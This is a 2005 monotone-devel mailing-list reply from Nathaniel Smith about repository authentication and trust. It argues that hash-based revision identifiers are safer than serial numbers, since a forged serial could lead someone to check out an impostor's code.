Trust in monotone (was Re: [Monotone-devel] newbie question - SHA1 vs serials)

[Nathaniel Smith]

On Tue, Apr 19, 2005 at 09:50:57AM -0700, K. Richard Pixley wrote:
> In other messages, I've agreed that some form of repository 
> authentication would solve the problem.  Long term, I think this sort of 
> feature would be very useful in monotone, even aside from the issue of 
> man-in-the-middle and imposter attacks.
> 
> As I read the manual, (the sum of my monotone experience), monotone is 
> currently vulnerable to these problems already.  And finding a means of 
> addressing it would seem to be a welcome addition in any case.

We do have "repository authentication" at netsync time -- mostly as a
way to prevent public monotone servers from being turned into warez
distribution networks, etc.

For more protection, we prefer to define trust at the edges; there's
at least a somewhat thought-out design for how to do this more
systematicall (the current get_revision_cert_trust hook is very much a
stopgap measure).  Anyone interested can see some discussion:
  http://frances.vorpus.org/~njs/mt-permission.log

Trust is also a rather serious problem with serials.  The case where I
have foo.bar.com and someone sends me 1:foo.bar.com isn't so bad; the
bad case is where I have foo.bar.com and someone else sends _you_
1:foo.bar.com, you have no way to tell whether it's valid or not, and
now when I tell you "hey, can you check out this bug I'm working on
in 1:foo.bar.com?", you may unknowingly check out and run the evil
person's code instead.  Hashes, you _always_ can communicate reliably.

-- Nathaniel

-- 
.i dei jitfa fanmo xatra